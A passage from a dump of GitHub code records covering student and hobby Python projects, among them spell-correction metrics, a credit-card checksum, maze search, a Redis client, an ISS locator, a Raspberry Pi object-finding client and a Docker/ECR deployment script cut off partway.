corrected_text, flags=regex.UNICODE)\n    with open('metrics_corrected.txt', 'a+') as file_desc:\n        print(f'\\n-- FUNCTION {function_name} - TEST {id_test} --', file=file_desc)\n        print(corrected_text, file=file_desc)\n\n    # Compute the metrics\n    print('-- Computing metrics --', file=sys.stderr)\n    true_positives_wrong_correction = 0  # There is an error and the token is corrected incorrectly\n    true_positives_right_correction = 0  # There is an error and the token is corrected correctly\n    true_negatives = 0   # There is no error and the token is kept\n    false_positives = 0  # There is no error, but the token is corrected\n    false_negatives = 0  # There is an error, but it is not corrected\n    total_words = 0\n\n    for i, token in enumerate(original_tokens):\n        if is_word(token) or is_word(errors_tokens[i]) or is_word(corrected_tokens[i]):\n            total_words += 1\n            classif = classification(token, errors_tokens[i], corrected_tokens[i])\n            # True Positives, wrong correction\n            if classif == 'TPW':\n                true_positives_wrong_correction += 1\n            # True Positives, right correction\n            elif classif == 'TPR':\n                true_positives_right_correction += 1\n            # True Negatives\n            elif classif == 'TN':\n                true_negatives += 1\n            # False Positives\n            elif classif == 'FP':\n                false_positives += 1\n            # False Negatives\n            elif classif == 'FN':\n                false_negatives += 1\n\n    return true_positives_wrong_correction, true_positives_right_correction, true_negatives, \\\n        false_positives, false_negatives, total_words, duration\n\n\ndef run_tests(function_name, function, original_tokens, wrong_texts, n_tests):\n    \"Run tests.\"\n    true_positives_wrong_correction = 0  # There is an error and the token is corrected incorrectly\n    true_positives_right_correction = 0  # There is an error and the token is corrected correctly\n    true_negatives = 0   # There is no error and the token is kept\n    false_positives = 0  # There is no error, but the token is corrected\n    false_negatives = 0  # There is an error, but it is not corrected\n    total_words = 0\n    duration = 0\n\n    for i in range(0, n_tests):\n        m_tpw, m_tpr, m_tn, m_fp, m_fn, m_tw, m_d = get_metrics(function_name, i, function,\n                                                                original_tokens, wrong_texts[i])\n        true_positives_wrong_correction += m_tpw\n        true_positives_right_correction += m_tpr\n        true_negatives += m_tn\n        false_positives += 
m_fp\n        false_negatives += m_fn\n        total_words += m_tw\n        if isinstance(m_d, tuple):\n            if i == 0:\n                duration = [m_d[0], m_d[1]]\n            else:\n                duration[0] += m_d[0]\n                duration[1] += m_d[1]\n        else:\n            duration += m_d\n\n    true_positives_wrong_correction /= n_tests\n    true_positives_right_correction /= n_tests\n    true_negatives /= n_tests\n    false_positives /= n_tests\n    false_negatives /= n_tests\n    total_words /= n_tests\n    if isinstance(duration, list):\n        duration[0] /= n_tests\n        duration[1] /= n_tests\n    else:\n        duration /= n_tests\n\n    true_positives = true_positives_right_correction + true_positives_wrong_correction\n\n    if total_words > 0:\n        accuracy = round((true_positives_right_correction + true_negatives) / total_words, 2)\n\n        if true_positives + false_positives > 0:\n            precision = round(true_positives_right_correction / (true_positives + false_positives),\n                              2)\n        else:\n            precision = None\n\n        if true_positives + false_negatives > 0:\n            recall = round(true_positives_right_correction / (true_positives + false_negatives), 2)\n        else:\n            recall = None\n\n        if precision and recall and precision + recall > 0:\n            harmonic_mean = round(2 * ((precision * recall) / (precision + recall)), 2)\n        else:\n            harmonic_mean = None\n\n        if true_positives + false_negatives > 0:\n            true_positive_rate = round(true_positives_right_correction /\n                                       (true_positives + false_negatives), 2)\n        else:\n            true_positive_rate = None\n\n        if false_positives + true_negatives > 0:\n            false_positive_rate = round(false_positives / (false_positives + true_negatives), 2)\n        else:\n            false_positive_rate = None\n    else:\n        accuracy = None\n        precision = None\n        recall = None\n        harmonic_mean = None\n        true_positive_rate = None\n        false_positive_rate = None\n\n    return true_positives_wrong_correction, true_positives_right_correction, true_negatives,\\\n        false_positives, false_negatives, accuracy, precision, recall, harmonic_mean,\\\n        true_positive_rate, false_positive_rate, duration\n\n\ndef main():\n    \"Main function.\"\n    # Read the correct text\n    print('-- Reading the correct text --', file=sys.stderr)\n    original_text = ''.join([line for line in fileinput.input(sys.argv[1:])])\n    original_tokens = regex.findall(r'\\w+|\\s+|\\p{P}+', original_text, flags=regex.UNICODE)\n\n    print('-- Injecting errors into the original text (5x) --', file=sys.stderr)\n    wrong_texts = get_wrong_texts(5, original_tokens)\n\n    # Build the output table structure\n    table = PrettyTable()\n    table.field_names = [\"Metrics\", \"Manual\", \"Aspell\", \"Hunspell\", \"Symspell\"]\n    tpw_list = ['True Positives Wrong']\n    tpr_list = ['True Positives Right']\n    tn_list = ['True Negatives']\n    fp_list = ['False Positives']\n    fn_list = ['False Negatives']\n    accuracy_list = ['Accuracy']\n    precision_list = ['Precision']\n    recall_list = ['Recall']\n    hm_list = ['Harmonic Mean']\n    tp_rate_list = ['TP Rate']\n    fp_rate_list = ['FP Rate']\n    d_list = ['Duration (sec)']\n\n    m_tpw, m_tpr, m_tn, m_fp, m_fn, accuracy, precision, recall, h_mean, tp_rate, fp_rate, dur = \\\n        run_tests('Manual', spellcorrector.correct_text, original_tokens, wrong_texts, 5)\n    tpw_list.append(m_tpw)\n    tpr_list.append(m_tpr)\n    tn_list.append(m_tn)\n    fp_list.append(m_fp)\n    fn_list.append(m_fn)\n    accuracy_list.append(accuracy)\n    precision_list.append(precision)\n    recall_list.append(recall)\n    hm_list.append(h_mean)\n    tp_rate_list.append(tp_rate)\n    fp_rate_list.append(fp_rate)\n    d_list.append(f'{round(dur[0],2)} + {round(dur[1],2)}')\n\n    function_names = [\"Aspell\", \"Hunspell\", \"Symspell\"]\n    functions = [spellcorrector.correct_line_aspell, 
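# Sketch (editorial aside, not part of any record): the precision/recall/F1
# formulas implemented in run_tests above, as a standalone helper. As in the
# original, only *right* corrections count toward the numerator.
def prf(tp_right, tp_wrong, fp, fn):
    tp = tp_right + tp_wrong
    precision = tp_right / (tp + fp) if tp + fp else None
    recall = tp_right / (tp + fn) if tp + fn else None
    f1 = (2 * precision * recall / (precision + recall)
          if precision and recall else None)
    return precision, recall, f1

assert prf(5, 5, 0, 0) == (0.5, 0.5, 0.5)   # wrong corrections drag all three down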
spellcorrector.correct_line_hunspell,\n                 spellcorrector.correct_line_symspell]\n    for i in range(0, 3):\n        m_tpw, m_tpr, m_tn, m_fp, m_fn, accuracy, precision, recall, h_mean, tp_rate, fp_rate, \\\n            dur = run_tests(function_names[i], functions[i], original_tokens, wrong_texts, 5)\n        tpw_list.append(m_tpw)\n        tpr_list.append(m_tpr)\n        tn_list.append(m_tn)\n        fp_list.append(m_fp)\n        fn_list.append(m_fn)\n        accuracy_list.append(accuracy)\n        precision_list.append(precision)\n        recall_list.append(recall)\n        hm_list.append(h_mean)\n        tp_rate_list.append(tp_rate)\n        fp_rate_list.append(fp_rate)\n        d_list.append(str(round(dur, 2)))\n\n    table.add_row(tpw_list)\n    table.add_row(tpr_list)\n    table.add_row(tn_list)\n    table.add_row(fp_list)\n    table.add_row(fn_list)\n    table.add_row(accuracy_list)\n    table.add_row(precision_list)\n    table.add_row(recall_list)\n    table.add_row(hm_list)\n    table.add_row(tp_rate_list)\n    table.add_row(fp_rate_list)\n    table.add_row(d_list)\n\n    print(table)\n\n\nif __name__ == \"__main__\":\n    main()\n\n__author__ = \"João Barreira, Mafalda Nunes\"\n__email__ = \"a73831@alunos.uminho.pt, a77364@alunos.uminho.pt\"\n","repo_name":"barreira/spln-1819","sub_path":"tp3/scripts/metrics_measure.py","file_name":"metrics_measure.py","file_ext":"py","file_size_in_byte":12532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6503734849","text":"import cs50\n\ndef checksum (c):\n    card_length = 0\n    first_two = 0\n    \n    ##other = even numbers, not odd ones!\n    other_sum = 0\n    nonother_sum = 0\n    while c > 0: \n        card_length+=1\n        if card_length % 2 == 0 :\n            if (c % 10 * 2) >= 10:\n                other_sum += (c%10 * 2) % 10 + 1  ##sum of the two digits of the doubled value\n            else:\n                other_sum += (c%10 * 2)\n        else:\n            nonother_sum += (c%10)\n        c=c//10 ##unlike in c, normal division would not round integer, since it would produce a float\n        if c < 100 and c >=10:\n            first_two = c\n    \n    if ((card_length != 13 and card_length != 15 and card_length != 16) or (((other_sum + nonother_sum) % 10) != 0)):\n        print(\"INVALID\\n\")\n    \n    else:\n        if card_length == 15 and (first_two == 34 or first_two == 37):\n            print (\"AMEX\\n\")\n        elif (card_length == 16 and (51 <= first_two and first_two <= 55)):\n            print (\"MASTERCARD\\n\")\n        elif (card_length == 13 or card_length == 16) and (39 < first_two and first_two < 50):\n            print (\"VISA\\n\")\n    \ndef main():\n    print (\"Input credit card number here: \", end=\"\")\n    card_num = cs50.get_int() ##to take care of the possibility of user inputting a non-integer input\n    checksum(card_num)\n    \nif __name__ == '__main__':\n    main()","repo_name":"NickSadjoli/cs50","sub_path":"pset6/credit.py","file_name":"credit.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31783682321","text":"__author__ = \"Cody Swain\"\n\nimport time\nimport math\n\n## TO DO ##\n# This algorithm is inefficient because it passes the whole array with each recursive pass.\n# Memory usage can be reduced simply by using the indices with a while loop. 
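# Sketch (editorial aside, not part of any record): the index-based variant the
# TO DO above asks for -- O(1) extra memory, no array slicing. `find_peak` is a
# hypothetical name, not part of the original file.
def find_peak(arr):
    lo, hi = 0, len(arr) - 1
    while lo < hi:
        mid = (lo + hi) // 2
        if arr[mid] < arr[mid + 1]:
            lo = mid + 1          # some peak lies strictly to the right
        else:
            hi = mid              # arr[mid] >= arr[mid+1]: a peak is at mid or left
    return arr[lo]

assert find_peak([1, 3, 5, 7, 9, 11, 13, 15, 17, 18, 16, 14]) == 18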
\n\ndef binary_search_1d(arr):\n\t'''Binary search peak finding for a one dimensional array\n\tParameters\n\t----------\n\tarr : list\n\t\tList of numerical values with a peak.\n\t'''\n\n\t# Iteration metadata\n\tprint(\"Length: {len} \\t Array: {arr}\".format(arr=arr, len=len(arr)))\n\n\t# Algorithm Implementation\n\tn = len(arr)\n\tif n%2 == 0:\n\t\tmid_idx = int(n/2-1)\n\telse: \n\t\tmid_idx = int((n-1)/2)\n\tif arr[mid_idx] < arr[mid_idx-1]:\n\t\treturn binary_search(arr[:mid_idx])\n\telif arr[mid_idx] < arr[mid_idx+1]:\n\t\treturn binary_search(arr[mid_idx:])\n\telse: \n\t\tpeak = arr[mid_idx]\n\t\treturn peak\n\nif __name__ == \"__main__\":\n\t# Test Array\n\tarray = [1, 3, 5, 7, 9, 11, 13, 15, 17, 18, 16, 14, 12, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1]\n\t\n\t# Run binary search, and track runtime.\n\tprint(\"\\n\\nBinary search peak finding algorithm. \\n\")\n\tstart_time = time.time()\n\tpeak = binary_search(array)\n\tend_time = time.time()\n\tprint(\"\\nPeak found: {}\".format(peak))\n\tprint(\"Execution time: {}s\\n\\n\".format(end_time-start_time))","repo_name":"codyswain/Algorithms","sub_path":"binary_search_peak_finding.py","file_name":"binary_search_peak_finding.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16664513025","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom typing import Any\n\nfrom redis import AuthenticationError, Redis\n\nfrom httpfpt.common.log import log\nfrom httpfpt.core import get_conf\n\n\nclass RedisDB(Redis):\n def __init__(self) -> None:\n super().__init__(\n host=get_conf.REDIS_HOST,\n port=get_conf.REDIS_PORT,\n password=get_conf.REDIS_PASSWORD,\n db=get_conf.REDIS_DATABASE,\n socket_timeout=get_conf.REDIS_TIMEOUT,\n decode_responses=True, # 转码 utf-8\n )\n self.prefix = 'httpfpt'\n\n def init(self) -> None:\n try:\n self.ping()\n except TimeoutError:\n log.error('数据库 redis 连接超时')\n except AuthenticationError:\n log.error('数据库 redis 授权认证错误')\n except Exception as e:\n log.error(f'数据库 redis 连接异常: {e}')\n else:\n log.info('数据库 redis 连接成功')\n\n def get(self, key: Any, logging: bool = True) -> Any:\n \"\"\"\n 获取 redis 数据\n\n :param key:\n :param logging:\n :return:\n \"\"\"\n data = super().get(key)\n if not data:\n if logging:\n log.warning(f'获取 redis 数据 {key} 失败, 此数据不存在')\n return data\n\n def get_prefix(self, prefix: str) -> list:\n \"\"\"\n 获取 redis 符合前缀的数据\n\n :param prefix: key 前缀\n :return:\n \"\"\"\n data = []\n for key in self.scan_iter(match=f'{prefix}*'):\n value = super().get(key)\n if value:\n data.append(value)\n return data\n\n def rset(self, key: Any, value: Any, **kwargs) -> None:\n \"\"\"\n 重置设置 redis 数据\n\n :param key:\n :param value:\n :param kwargs:\n :return:\n \"\"\"\n if super().exists(key):\n self.delete(key)\n self.set(key, value, **kwargs)\n\n def delete_prefix(self, prefix: str) -> None:\n \"\"\"\n 删除 redis 符合前缀的数据\n\n :param prefix: key 前缀\n :return:\n \"\"\"\n for key in self.scan_iter(match=f'{prefix}*'):\n self.delete(key)\n\n\nredis_client = RedisDB()\n","repo_name":"wu-clan/automated_api_pytest","sub_path":"httpfpt/db/redis_db.py","file_name":"redis_db.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"4803918437","text":"from urllib.request import urlopen\nimport json\nfrom datetime import datetime\nfrom geopy.geocoders import Nominatim\n\niss_data = urlopen(\"http://api.open-notify.org/iss-now.json\") 
#Get data from API\n\niss_processed_data = json.loads(iss_data.read()) #Load data\n\ngeolocator = Nominatim(user_agent=\"Adam Khan's ISS Locator\") #Variable for calling Reverse Geocoding API\nlatAndLong = iss_processed_data['iss_position']['latitude'] + \", \" + iss_processed_data['iss_position']['longitude'] #Get Latitude and Longitude values for printing\nlatAndLong_no_space = iss_processed_data['iss_position']['latitude'] + \",\" + iss_processed_data['iss_position']['longitude'] #Latitude and Longitude for Google Maps link\n\nmaps_link = \"https://www.google.com/maps/search/?api=1&query=\" + latAndLong_no_space #Google Maps Link\ntry: #Try block works if there is an address (when ISS is over land)\n    location = geolocator.reverse(latAndLong)\n    print (\"The International Space Station is currently above: \", location.address)\n    print (\"Latitude: \", iss_processed_data['iss_position']['latitude'])\n    print (\"Longitude: \", iss_processed_data['iss_position']['longitude'])\n    print (\"Check out the current location on Google Maps: \", maps_link)\nexcept: #Except block is called when address can not be found\n    print (\"The International Space Station is currently over the ocean\")\n    print (\"Latitude: \", iss_processed_data['iss_position']['latitude'])\n    print (\"Longitude: \", iss_processed_data['iss_position']['longitude'])\n    print (\"Check out the current location on Google Maps: \", maps_link)","repo_name":"notadamkhan/Python-ISS-Finder","sub_path":"ISSfinder.py","file_name":"ISSfinder.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74870383780","text":"from heapq import heappop, heappush\nfrom typing import Dict, List, Tuple\n\n\ndef search(dct: Dict) -> List[Tuple[int, int]]:\n    \"\"\"\n    Solve the maze using uniform-cost search.\n\n    Write your implementation below\n    \"\"\"\n    r, c = dct[\"rows\"], dct[\"cols\"]\n\n    if not dct[\"goals\"]:\n        return []\n\n    x0, y0 = dct[\"start\"]\n    map = [[0 for i in range(c)] for j in range(r)]\n\n    # 0: walkable way 1: obstacles 3: goals\n    for i, j in dct[\"goals\"]:\n        map[i][j] = 3\n\n    for i, j in dct[\"obstacles\"]:\n        map[i][j] = 1\n\n    # early goal check is used in the main loop\n    # so start = goal case has to be checked here\n    if map[x0][y0] == 3:\n        return [(x0, y0)]\n\n    # visited nodes stores their parent nodes in the map\n    map[x0][y0] = None\n    actions = [(1, 0), (0, 1), (-1, 0), (0, -1)]\n\n    # heapq for frontier\n    front = [(0, x0, y0)]\n\n    def get_path(x: int, y: int) -> List[Tuple[int, int]]:\n        path = [(x, y)]\n        while map[x][y]:\n            path.append(map[x][y])\n            x, y = map[x][y]\n        path.reverse()\n        return path\n\n    # when all actions have same cost, ucs is equivalent to bfs\n    while front:\n        co, cx, cy = heappop(front)\n        for ax, ay in actions:\n            x, y = cx + ax, cy + ay\n            if x >= r or x < 0 or y >= c or y < 0:\n                continue\n            is_way = map[x][y] == 0\n            is_goal = map[x][y] == 3\n            if not is_way and not is_goal:\n                continue\n            map[x][y] = (cx, cy)\n            if is_goal:\n                return get_path(x, y)\n            heappush(front, (co + 1, x, y))\n\n    return []\n","repo_name":"IntrovertHedgehog/documents","sub_path":"study/computing/cs3243/Projects/Project 1/Code Templates/Pro1_1/A0219739N/ucs.py","file_name":"ucs.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34525147398","text":"import sys\nfrom itertools import combinations\n\ninput = sys.stdin.readline\n\nwhile True: # loop until break is hit
\n    l = list(map(int, input().split()))\n    if l[0] == 0: # break condition for the loop\n        break\n    else:\n        s = l[1:]\n        for i in combinations(s, 6): # every combination of 6 numbers from the given set\n            i = list(i)\n            print(*i)\n        print( )","repo_name":"msio900/coding_test","sub_path":"acmicpc/6603/6603.py","file_name":"6603.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"26553692854","text":"#!/usr/bin/python\n##\n# Description: Implements 2d banana distribution\n##\nimport numpy as np\nfrom scipy.stats import multivariate_normal\nimport matplotlib.pyplot as plt\n\n\nclass Banana_2D(object):\n    def __init__(self, mu1=0, mu2=0, sigma1=1, sigma2=1, rho=0.9, a=1.15, b=0.5):\n        self.mu1 = mu1\n        self.mu2 = mu2\n        # cov params\n        self.sigma1 = sigma1\n        self.sigma2 = sigma2\n        self.rho = rho\n        # transform params\n        self.a = a\n        self.b = b\n        # define gauss dist\n        mean_vec = np.array([self.mu1, self.mu2])\n        cov = np.array([[self.sigma1 ** 2.0, self.rho * (sigma1 * sigma2)], [self.rho * (sigma1 * sigma2), self.sigma2 ** 2.0]])\n        self.rv_2d_normal = multivariate_normal(mean_vec, cov)\n\n    def pdf(self, y1, y2):\n        # transform coords\n        x1_inv = y1 / self.a\n        x2_inv = (y2 - self.b * (x1_inv ** 2.0 + self.a ** 2.0)) * self.a\n\n        pos = np.dstack((x1_inv, x2_inv))\n        # eval gauss pdf at transformed coords\n        return self.rv_2d_normal.pdf(pos)\n\n    def ln_like(self, y):\n        assert len(y) == 2\n        return np.log(self.pdf(y[0], y[1]))\n\n    def check_prob_lvl(self, y1, y2, pdf_lvl):\n        return pdf_lvl < self.pdf(y1, y2)\n\n    def transform(self, x1, x2):\n        y1 = self.a * x1\n        y2 = x2 / self.a + self.b * (x1 ** 2.0 + self.a ** 2.0)\n        return y1, y2\n\n    def inv_transform(self, y1, y2):\n        x1_inv = y1 / self.a\n        x2_inv = (y2 - self.b * (x1_inv ** 2.0 + self.a ** 2.0)) * self.a\n        return x1_inv, x2_inv\n\n    def rvs(self, n_samples):\n        # sample from gauss\n        samples = self.rv_2d_normal.rvs(size=n_samples)\n        x1_sample, x2_sample = samples[:, 0], samples[:, 1]\n\n        # move sample to transformed coords\n        y1 = self.a * x1_sample\n        y2 = x2_sample / self.a + self.b * (x1_sample ** 2.0 + self.a ** 2.0)\n        return (y1, y2)\n\n    def cdf(self, y1, y2):\n        # invert transform coords\n        x1_inv = y1 / self.a\n        x2_inv = (y2 - self.b * (x1_inv ** 2.0 + self.a ** 2.0)) * self.a\n        pos = np.dstack((x1_inv, x2_inv))\n\n        # eval gauss cdf at inv transform coords\n        return self.rv_2d_normal.cdf(pos)\n\n\nif __name__ == \"__main__\":\n    banana = Banana_2D()\n    y1, y2 = banana.rvs(10000)\n    plt.figure()\n    plt.scatter(y1, y2, s=2, alpha=0.3)\n    plt.grid(ls='--', alpha=0.5)\n    plt.savefig(\"banana_plot_samples_ex.png\")\n    plt.close()\n\n    plt.figure()\n    y1 = np.linspace(-4, 4, 100)\n    y2 = np.linspace(-2, 8, 100)\n    y1, y2 = np.meshgrid(y1, y2)\n    p = banana.pdf(y1, y2)\n    plt.contourf(y1, y2, p)\n    plt.grid(ls='--', alpha=0.5)\n    plt.savefig(\"banana_plot_pdf_ex.png\")\n    plt.close()\n\n    plt.figure()\n    y1 = np.linspace(-4, 4, 100)\n    y2 = np.linspace(-2, 8, 100)\n    y1, y2 = np.meshgrid(y1, y2)\n    c = banana.cdf(y1, y2)\n    plt.contourf(y1, y2, c)\n    plt.grid(ls='--', alpha=0.5)\n    plt.savefig(\"banana_plot_cdf_ex.png\")\n    plt.close()\n","repo_name":"wgurecky/bipymc","sub_path":"bipymc/utils/banana_rv.py","file_name":"banana_rv.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"2116465783","text":"T = 10\n\ndef solve(num, cnt):\n    global a, b, result\n    if cnt == b:\n        result = num\n        return result\n    solve(num * a, cnt + 1)\n\n\nfor cnt in 
range(1, T + 1):\n    count = int(input())\n    a, b = list(map(int, input().split()))\n    solve(a, 1)\n    print('#' + str(count) + ' ' + str(result))","repo_name":"Jungwoo-20/Algorithm","sub_path":"SWEA/1217.py","file_name":"1217.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6962874688","text":"#!/usr/bin/python3\nfrom socketUtils import *\nfrom imutils.video import VideoStream\nfrom parrot import *\nimport argparse\nimport re\nimport time\nimport socket\nimport pickle\nimport uuid\nimport os\n\nCLASSES = {'telephone':1, 'mug':2, 'remote control':3, 'remote':3, 'bottle':4, 'hand':5}\nclass_id = \"class_id\"\nmask = \"mask\"\nroi = \"roi\"\nscore = \"score\"\n\nclass InferenceClient:\n    def __init__(self, host, port):\n        self.Host = host\n        self.Port = port\n        self.Server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        self.Server.connect((host, port))\n\n    def GetDetections(self, img_id, frame):\n        data = EvaluationData(img_id, frame)\n\n        pkg = pickle.dumps(data)\n        send_msg(self.Server, pkg)\n\n        data = recv_msg(self.Server)\n        resp = pickle.loads(data)\n        return resp\n\n    def Close(self):\n        self.Server.close()\n\ndef ip_with_port(arg):\n    if re.match(r'\\d{1,3}[.]\\d{1,3}[.]\\d{1,3}[.]\\d{1,3}[:]\\d+', arg):\n        return arg\n    raise argparse.ArgumentTypeError('Server address must follow the format \\'0.0.0.0:<port>\\'')\n\ndef play_ready():\n    os.system('aplay -q ready.wav')\n\ndef play_error():\n    os.system('aplay -q error.wav')\n\ndef get_detection_centre(detection):\n    return ( ((detection[roi][3] - detection[roi][1]) / 2) + detection[roi][1], ((detection[roi][2] - detection[roi][0]) / 2) + detection[roi][0] )\n\ndef get_detection_area(detection):\n    return (detection[roi][3] - detection[roi][1]) * (detection[roi][2] - detection[roi][0])\n\n# construct the argument parse and parse the arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-s\", \"--server\", required=True, type=ip_with_port, help=\"IP and port of the server being used for detection. 
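# Sketch (editorial aside, not part of any record): the SWEA 1217 record above
# computes a**b with one multiply per recursion level; binary exponentiation
# needs only O(log b) multiplies. `fast_pow` is a hypothetical name.
def fast_pow(a, b):
    result = 1
    while b:
        if b & 1:            # this bit of the exponent is set
            result *= a
        a *= a               # square the base for the next bit
        b >>= 1
    return result

assert fast_pow(2, 10) == 1024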
Required format - 0.0.0.0:<port>\")\nparser.add_argument(\"-P\", \"--picamera\", action=\"store_true\", help=\"Whether or not the Raspberry Pi camera should be used\")\n\nargs = parser.parse_args()\n\nhost, port = args.server.split(':')\nport = int(port)\nclient = InferenceClient(host, port)\n\n# initialize the video stream and allow the camera sensor to warmup\nvs = VideoStream(usePiCamera=args.picamera).start()\ntime.sleep(2.0)\n\n###\nlis = Listener()\nspkr = Speaker()\n\nspkr.Queue(\"Hello human\")\nspkr.Say(\"Give me a moment to get organized\")\n\npattern = r\"(?P<action>(where)|(find))\\s*(is)?\\s*(the)?\\s*(?P<thing>\\w+)\"\n\ntry:\n    lis.GetMicrophone('USB2.0')\nexcept MicrophoneException as e:\n    print(str(e))\n    spkr.Say(str(e))\n    exit(1)\n\nspkr.Say(\"Ok, I'm ready\")\nwhile True:\n    lis.ListenForKeyword(['raspberry'])\n    play_ready()\n\n    grammar_file = 'pi_commands.fsg'\n    text = lis.ListenForCommand(grammar_file)\n    if not text:\n        spkr.Say(\"Sorry, I didn't understand\")\n        continue\n\n    print(text)\n    match = re.match(pattern, text)\n    if not match:\n        play_error()\n        continue\n\n    thing = match.group('thing')\n    print(thing)\n    spkr.Say(\"You are looking for the %s\" % thing)\n\n    targetClass = CLASSES[thing]\n    # Guidance loop\n    while True: # TODO: stop when found\n        # Get frame and run it through inference\n        frame = vs.read()\n        frame_size = frame.shape\n        img_id = uuid.uuid4()\n        detections = client.GetDetections(img_id, frame)\n\n        # Get best/closest detections when multiple instances\n        isHand = False\n        centre = (frame_size[1]/2, frame_size[0]/2)  # (x, y) = frame centre; shape is (rows, cols, ch)\n        print(centre)\n\n        lastArea = 0\n        target = []\n        for detection in detections:\n            if detection[class_id] == targetClass:\n                area = get_detection_area(detection)\n                if area > lastArea:\n                    lastArea = area\n                    target = detection\n            elif detection[class_id] == CLASSES[\"hand\"]:\n                centre = get_detection_centre(detection)\n                isHand = True\n\n        # If object not in sight, play error\n        if not target:\n            play_error()\n            time.sleep(0.1)\n            continue\n\n        # Get target vector (x = column, y = row)\n        target_centre = get_detection_centre(target)\n        vector_hor = target_centre[0] - centre[0]\n        vector_ver = target_centre[1] - centre[1]\n\n        horizontal_tolerance = frame_size[1]/3\n        vertical_tolerance = frame_size[0]/3\n\n        # Queue up directions\n        if vector_hor > horizontal_tolerance:\n            spkr.Queue(\"Right\")\n        elif vector_hor < -horizontal_tolerance:\n            spkr.Queue(\"Left\")\n\n        if vector_ver > vertical_tolerance:\n            spkr.Queue(\"Down\")\n        elif vector_ver < -vertical_tolerance:\n            spkr.Queue(\"Up\")\n\n        # Give directions\n        spkr.Flush()\n        time.sleep(0.1)","repo_name":"pchataignier/masters","sub_path":"raspberry_client.py","file_name":"raspberry_client.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14350308832","text":"def on_received_number(receivedNumber):\n    if receivedNumber == 1:\n        basic.pause(500)\n        servos.P1.set_angle(0)\n        basic.pause(500)\n        servos.P1.stop()\n        strip.show_color(neopixel.colors(NeoPixelColors.RED))\n        basic.pause(500)\n    elif receivedNumber == 2:\n        servos.P1.set_angle(90)\n        basic.pause(500)\n        servos.P1.stop()\n        strip.show_color(neopixel.colors(NeoPixelColors.BLACK))\nradio.on_received_number(on_received_number)\n\ndef on_button_pressed_a():\n    radio.send_number(1)\n    servos.P1.set_angle(90)\n    basic.pause(500)\n    servos.P1.stop()\n    strip.show_color(neopixel.colors(NeoPixelColors.BLACK))\n    OLED.clear()\n    OLED.write_string_new_line(\"Lukka\")\n    OLED.draw_line(0, 64, 128, 0)\n    OLED.draw_line(128, 64, 0, 0)\ninput.on_button_pressed(Button.A, on_button_pressed_a)\n\ndef 
on_button_pressed_b():\n    pass\ninput.on_button_pressed(Button.B, on_button_pressed_b)\n\nstrip: neopixel.Strip = None\nradio.set_group(1)\nled.enable(False)\nstrip = neopixel.create(DigitalPin.P2, 1, NeoPixelMode.RGB)\nOLED.init(128, 64)\n\ndef on_forever():\n    if smarthome.read_noise(AnalogPin.P3) > 80:\n        radio.send_number(2)\n        servos.P1.set_angle(2)\n        basic.pause(500)\n        servos.P1.stop()\n        strip.show_color(neopixel.colors(NeoPixelColors.RED))\n        OLED.clear()\n        OLED.write_string_new_line(\"Open\")\nbasic.forever(on_forever)\n","repo_name":"NewtonVoss/modul2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32705819727","text":"import pathlib\nimport docker\nimport argparse\nimport logging\nimport jmespath\nimport json\nimport boto3\nimport base64\nimport sys\n\n\nfrom python_terraform import *\n\nfrom typing import List\n\n# Log to file & stdout\nlogging.basicConfig(filename=\"nginx-system.log\", level=logging.INFO)\nlogging.getLogger().addHandler(logging.StreamHandler())\n\n# GLOBALS\nCWD: pathlib.Path = pathlib.Path().expanduser().resolve()\nDOCKER_PATH: pathlib.Path = CWD.joinpath('nginx-image')\nSERVICE_PATH: pathlib.Path = CWD.joinpath('service')\nDOCKER_CLIENT = docker.from_env()\n\n\ndef create_docker_images_and_push(profile: str, region: str, do_push: bool = False) -> None:\n    \"\"\"\n    Create images\n    \"\"\"\n    # Build the current Image\n    logging.info(\"Building the Docker Container\")\n    DOCKER_CLIENT.images.build(\n        path=str(DOCKER_PATH),\n        tag=\"nginx-container:latest\",\n        quiet=False\n    )\n\n    # search for a tf state file\n    terraform = [p for p in SERVICE_PATH.rglob(\"*.tfstate\")]\n\n    if not terraform:\n        logging.info(\"Can't get repo name from tfstate file\")\n        sys.exit(1)\n\n    # load tf state file\n    with terraform[0].open(mode='r') as fp:\n        tf_state_data = json.load(fp)\n\n    # find the repository_url\n    list_of_repository_url: List[str] = jmespath.search(\n        \"resources[?type=='aws_ecr_repository'].instances | [0][*].attributes.repository_url\",\n        tf_state_data\n    )\n    # check whether we were able to get the repo\n    if list_of_repository_url:\n        repository_url: str = list_of_repository_url.pop(0)\n        logging.info(f\"info: repo name is {repository_url}\")\n\n        # 1) re-tag with repository_url\n        current_image = DOCKER_CLIENT.images.get(\"nginx-container:latest\")\n        current_image.tag(f\"{repository_url}:latest\")\n\n        # 2) push image to aws\n        if do_push:\n            session = boto3.Session(profile_name=profile, region_name=region)\n            ecr_client = session.client('ecr')\n\n            token = 